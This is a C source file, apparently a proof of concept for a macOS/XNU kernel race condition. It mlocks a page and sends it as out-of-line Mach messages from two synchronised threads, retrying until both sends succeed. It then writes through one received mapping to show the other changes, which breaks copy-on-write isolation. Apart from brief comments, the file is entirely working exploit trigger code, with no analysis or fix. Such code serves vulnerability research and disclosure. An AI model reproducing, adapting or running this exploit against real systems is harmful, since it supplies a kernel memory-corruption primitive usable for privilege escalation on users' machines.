#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <pthread.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/vm_region.h>

void* alloc_wired_pages(size_t size) {
    // mmap a page
    void* ptr = mmap(NULL,
                     size,
                     PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE,
                     0,
                     0);
    printf("ptr %p\n", ptr);
    return ptr;
}

unsigned short get_wire_count(void* addr) {
    struct vm_region_basic_info_64 region_info = {0};
    kern_return_t kr;
    mach_vm_size_t size = 0;
    mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64;
    mach_port_t object_name = MACH_PORT_NULL;

    kr = mach_vm_region(mach_task_self(),
                        (mach_vm_address_t*)(&addr),
                        &size,
                        VM_REGION_BASIC_INFO_64,
                        (vm_region_info_t)(&region_info),
                        &count,
                        &object_name);
    if (kr != KERN_SUCCESS) {
        printf("mach_vm_region failed (%x)\n", kr);
        return 0;
    }

    printf("mach_vm_region success\n");

    return region_info.user_wired_count;
}

// this non-atomic page has a user_wire_count of non-zero
// therefor the vm_map lock will be dropped in vm_map_delete...
void* get_nonatomic_alloc(size_t size) {
    void* mem = alloc_wired_pages(size);

    // get the wired count
    unsigned short user_wire_count = get_wire_count(mem);
    printf("user_wire_count: 0x%x\n", user_wire_count);

    // wire it
    int lock_err = mlock(mem, size);
    if (lock_err != 0) {
        printf("mlock failed\n");
    } else {
        printf("mlock success!\n");
    }

    // get the wire count
    user_wire_count = get_wire_count(mem);
    printf("user_wire_count: 0x%x\n", user_wire_count);

    return mem;
}

struct send_msg {
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_descriptor_t desc;
};

struct rcv_msg {
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_descriptor_t desc;
  mach_msg_trailer_t trailer;
};

volatile int lock_a;
volatile int lock_b;

void* thread_func(void* arg) {
  lock_a = 1;
  while(lock_b == 0) {;}
  kern_return_t err = mach_msg_send((mach_msg_header_t*)arg);
  return (void*) err;
}

int go() {
    size_t nonatomic_size = 0x10000;
    void* mem = get_nonatomic_alloc(nonatomic_size);
    memset(mem, 'X', nonatomic_size);

    // in two threads we need to send this page OOL at the same time

    // allocate two ports for the messages
    mach_port_t msg_a_port = MACH_PORT_NULL;
    mach_port_t msg_b_port = MACH_PORT_NULL;
    kern_return_t err;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &msg_a_port);
    if (err != KERN_SUCCESS) {
        printf("mach_port_allocate failed: %x %s\n", err, mach_error_string(err));
        return 0;
    }
    
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &msg_b_port);
    if (err != KERN_SUCCESS) {
        printf("mach_port_allocate failed: %x %s\n", err, mach_error_string(err));
        return 0;
    }

    // two message structures to send at the same time
    struct send_msg msg_a = {};
    struct send_msg msg_b = {};

    // message a
    msg_a.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, 0) | MACH_MSGH_BITS_COMPLEX;
    msg_a.hdr.msgh_size = sizeof(struct send_msg);
    msg_a.hdr.msgh_remote_port = msg_a_port;
    msg_a.hdr.msgh_local_port = MACH_PORT_NULL;
    msg_a.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg_a.hdr.msgh_id = 0x41424344;

    msg_a.body.msgh_descriptor_count = 1;

    msg_a.desc.type = MACH_MSG_OOL_DESCRIPTOR;
    msg_a.desc.copy = MACH_MSG_VIRTUAL_COPY;
    msg_a.desc.deallocate = 1;
    msg_a.desc.address = mem;
    msg_a.desc.size = nonatomic_size;

    // message b
    msg_b.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, 0) | MACH_MSGH_BITS_COMPLEX;
    msg_b.hdr.msgh_size = sizeof(struct send_msg);
    msg_b.hdr.msgh_remote_port = msg_b_port;
    msg_b.hdr.msgh_local_port = MACH_PORT_NULL;
    msg_b.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg_b.hdr.msgh_id = 0x41424344;

    msg_b.body.msgh_descriptor_count = 1;

    msg_b.desc.type = MACH_MSG_OOL_DESCRIPTOR;
    msg_b.desc.copy = MACH_MSG_VIRTUAL_COPY;
    msg_b.desc.deallocate = 1;
    msg_b.desc.address = mem;
    msg_b.desc.size = nonatomic_size;

    // try sending them in parallel;
    // need a thread we can try to sync with:
    lock_a = 0;
    lock_b = 0;
    
    pthread_t th;
    pthread_create(&th, NULL, thread_func, (void*)&msg_a);

    while(lock_a == 0){;}
    lock_b = 1;

    kern_return_t msg_b_err = mach_msg_send(&msg_b.hdr);

    void* remote_retval = 0;
    pthread_join(th, &remote_retval);
    kern_return_t msg_a_err = (kern_return_t)remote_retval;

    printf("msg_a send: %x %s\n", msg_a_err, mach_error_string(msg_a_err));
    printf("msg_b send: %x %s\n", msg_b_err, mach_error_string(msg_b_err));

    if (msg_a_err == KERN_SUCCESS && msg_b_err == KERN_SUCCESS) {
        printf("**** they both sent! ****\n");
    } else {
        printf("fail\n");
        // for now, destroy everything and go again

        mach_port_destroy(mach_task_self(), msg_a_port);
        mach_port_destroy(mach_task_self(), msg_b_port);

        return 0;
    }

    // receive both the descriptors and look at the mem

    struct rcv_msg rcv_msg_a = {0};

    if (msg_a_err == KERN_SUCCESS) {
        rcv_msg_a.hdr.msgh_local_port = msg_a_port;
        rcv_msg_a.hdr.msgh_size = sizeof(struct rcv_msg);
        err = mach_msg_receive(&rcv_msg_a.hdr);
        if (err != KERN_SUCCESS) {
          printf("mach_msg_receive failed for msg_a_port: %x %s\n", err, mach_error_string(err));
          return 0;
        }
    }

    struct rcv_msg rcv_msg_b = {0};

    if (msg_b_err == KERN_SUCCESS) {
        rcv_msg_b.hdr.msgh_local_port = msg_b_port;
        rcv_msg_b.hdr.msgh_size = sizeof(struct rcv_msg);
        err = mach_msg_receive(&rcv_msg_b.hdr);
        if (err != KERN_SUCCESS) {
          printf("mach_msg_receive failed for msg_b_port: %x %s\n", err, mach_error_string(err));
          return 0;
        }
    }

    mach_port_destroy(mach_task_self(), msg_a_port);
    mach_port_destroy(mach_task_self(), msg_b_port);

    volatile char* rcv_a_addr = rcv_msg_a.desc.address;
    volatile char* rcv_b_addr = rcv_msg_b.desc.address;

    printf("rcv_a_addr: %p\n", rcv_a_addr);
    printf("rcv_b_addr: %p\n", rcv_b_addr);


    printf("*a before: %c\n", *rcv_a_addr);

    *rcv_b_addr = 'O';

    printf("*a after: %c\n", *rcv_a_addr);

    
    return 1;
}

int main(int argc, char** argv) {
    while(!go()) {;}
    return 0;
}
